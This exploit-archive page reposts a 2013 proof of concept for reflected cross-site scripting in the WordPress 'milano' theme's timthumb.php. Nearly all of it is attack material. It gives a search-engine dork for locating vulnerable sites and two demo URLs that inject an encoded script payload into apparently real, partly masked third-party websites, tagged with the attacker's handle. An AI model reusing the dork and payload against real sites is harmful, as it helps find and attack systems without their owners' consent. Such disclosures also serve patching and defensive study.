WordPress milano Theme Cross Site Scripting

2013.05.25
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

############## # Exploit Title : Wordpress milano Theme Cross Site Scripting # # Exploit Author : Ashiyane Digital Security Team # # Date : 2013 / 05 # # Home : www.Ashiyane.org # # Security Risk : Medium # # Dork : inurl:/wp-content/themes/milano/milano/timthumb.php?src= # # Tested on: Linux , Win 7 # ############## #Location:site/[path]/wp-content/themes/milano/milano/timthumb.php?src= # #DEm0: # http://acm.jaXXXana.edu.co/wp-content/themes/milano/milano/timthumb.php?src=%22/%3E%3CScript%3Ealert%28/%20XsseD%20bY%20Alireza666/%29%3C/script%3E # # http://luminXessa.ua/wp-content/themes/milano/milano/timthumb.php?src=%22/%3E%3CScript%3Ealert%28/%20XsseD%20bY%20Alireza666/%29%3C/script%3E # ############## #Greetz to: My Lord God ############## # # Alireza666 # ##############


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top